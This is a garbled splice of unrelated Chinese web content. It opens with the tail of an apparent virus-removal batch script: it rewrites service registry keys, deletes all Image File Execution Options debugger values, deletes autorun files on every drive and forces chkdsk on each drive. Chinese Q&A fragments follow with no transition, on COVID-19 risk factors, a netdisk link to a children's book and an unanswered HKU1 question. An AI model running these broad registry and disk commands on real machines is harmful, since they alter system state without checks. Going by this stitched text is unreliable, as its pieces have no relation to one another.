echo 6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>tmp.忆林子.reg
echo "ObjectName"="LocalSystem">>tmp.忆林子.reg
echo "Start"=dword:00000002>>tmp.忆林子.reg
echo "Type"=dword:00000020>>tmp.忆林子.reg
echo.>>tmp.忆林子.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ERSvc\Parameters]>>tmp.忆林子.reg
echo "ServiceDll"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\>>tmp.忆林子.reg
echo 00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\>>tmp.忆林子.reg
echo 65,00,72,00,73,00,76,00,63,00,2e,00,64,00,6c,00,6c,00,00,00>>tmp.忆林子.reg
echo.>>tmp.忆林子.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ERSvc\Security]>>tmp.忆林子.reg
echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\>>tmp.忆林子.reg
echo 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\>>tmp.忆林子.reg
echo 00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\>>tmp.忆林子.reg
echo 05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\>>tmp.忆林子.reg
echo 20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\>>tmp.忆林子.reg
echo 00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\>>tmp.忆林子.reg
echo 00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>tmp.忆林子.reg
echo.>>tmp.忆林子.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ERSvc\Enum]>>tmp.忆林子.reg
echo "0"="Root\\LEGACY_ERSVC\\0000">>tmp.忆林子.reg
echo "Count"=dword:00000001>>tmp.忆林子.reg
echo "NextInstance"=dword:00000001>>tmp.忆林子.reg
reg import tmp.忆林子.reg
for %%d in (c:\tmp1.忆林子,c:\tmp2.忆林子,tmp.忆林子,tmp.忆林子.reg) do (
if exist %%d del %%d /q
)
rem 改回被病毒修改的注册表项
reg add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v DoReport /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v ShowUI /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /d 1 /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v isFirstRun /f
for %%d in (c:\tmp1.忆林子,c:\tmp2.忆林子,tmp.忆林子,tmp.忆林子.reg) do (
if exist %%d del %%d /q
)
rem 删除病毒在注册表中添加的关联
if exist test.忆林子 del test.忆林子
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options">test.忆林子
for /f "tokens=* delims= skip=4" %%j in (test.忆林子) do (
reg delete "%%j" /v debugger /f
cls
if exist test.忆林子 del test.忆林子
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
echo.
echo 正在清除由病毒添加的注册表项,请稍候...
echo.
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
)
if exist test.忆林子 del test.忆林子
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft^\Windows NT\CurrentVersion\Image File Execution Options\Your Image File Name Here without a path" /v Debugger /d "ntsd -d" /f
cls
for %%f in (auto.exe,autorun.inf) do (
for /D %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
if exist %%d:\%%f attrib -s -h -r %%d:\%%f
if exist %%d:\%%f del %%d:\%%f /q
)
)
cls
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
echo.
echo 病毒清除完毕,按回车键开始解决分区无法双击打开的问题.
echo 注意:因为删除了第个分区根目录下的autorun.inf文件,所以要
echo 对你的分区进行磁盘检查才能双击打开,或者你也可以重启。
echo 在磁盘检查时你的一些应用程序像QQ可能会被强制退出。如果不想
echo 现在检查的话,请关闭该批处理。下次重启你的分区即可双击打开。
echo.
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
set /p test=
for /D %%d in (d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
if exist %%d:\ chkdsk %%d: /f /x
)
cls
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
echo.
set /p tmp= 操作结束,按回车键退出该程序。
exit
H. 扩增阳性Sars-cov-2是什么意思∵
目前全球约有400万人感染严重急性呼吸综合征冠状病毒2型(SARS-CoV-2),超过26万人死于2019冠状病毒病(COVID-19)并发症。这种流行病给患者、医疗保健提供者和决策者带来了严重挑战。根据患者过去和现在的医疗特点,及时将患者分为风险组,可以更好地应对其中的许多挑战。为了可靠地识别风险增加(或降低)的患者可以指导临床决策(例如住院与家庭护理)、公共卫生政策(例如,基于风险的隔离)和准备工作(例如,需要预期的医疗设备)。
有人提出了各种算法来识别有COVID-19(严重)并发症风险的患者。疾病控制和预防中心(CDC)认定,65岁及以上、居住在养老院或长期护理机构、或患有基础疾病(特别是如果控制不好的话)的个人有可能患上COVID-19的严重疾病,一些研究列出了70岁以上和一些潜在的条件作为关键疾病的危险因素。另一项研究称包括实体器官移植接受者、特定癌症或严重呼吸系统疾病患者、患有严重心脏病的孕妇以及感染风险增加的患者(例如由于免疫抑制治疗)是COVID-19风险组。此外,70岁以上的患者和那些患有一些潜在健康状况的患者(例如慢性呼吸系统疾病,体重指数≥40,孕妇)被认为是一个更广泛的弱势群体(也称为“流感群体”)。
最近的一项研究,以色列的研究团队分析了以色列所有SARS-CoV-2阳性患者的病历,比较了复杂人群和非复杂人群的患病率,并确定与COVID-19并发症相关的不同年龄和性别的情况,并分析强调了特定阶层的危险因素,可能有助于更好地识别不同人群中的危险患者。
研究团队的分析所强调的许多情况以前已经报道过,并且是常用的危险定义的一部分,包括高血压、肥胖、肾脏和心血管疾病。然而,也确定了一些额外的危险因素,尤其是18-50岁的男性抑郁患者以及65岁或65岁以上认知和神经障碍患者。这些增加可能在一定程度上与65岁以上年龄组的不同年龄分布有关。尽管如此,有了一些初步的支持,它们可能在未来的研究中值得更多的考虑。
综上所述,可靠地确定COVID-19并发症风险增加的患者可以指导临床决策、公共卫生政策和准备工作。迄今为止,全球公认的高危患者定义主要依赖于住院COVID-19患者的流行病学特征。分析表明,心血管和肾脏疾病、肥胖和高血压是COVID-19并发症的重要危险因素,18-50岁的男性抑郁患者以及65岁或65岁以上认知和神经障碍患者是显著的危险因素,吸烟和呼吸系统疾病的病史不会显著增加并发症的风险。根据这些观察结果,调整现有的风险定义可能会提高其准确性,并影响全球遏制大流行的努力。
特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务
I. 新型冠状病毒是一种什么样的病毒
安潇给孩子的冠状病毒绘本 网络网盘
链接: https://pan..com/s/1vidE3x7dekDsmLF07kYf0w 提取码: 4kc8 复制这段内容后打开网络网盘手机App,操作更方便哦
若资源有问题欢迎追问~
J. HcoV-HKu1几几年发现的
几几年发现的不知道啊?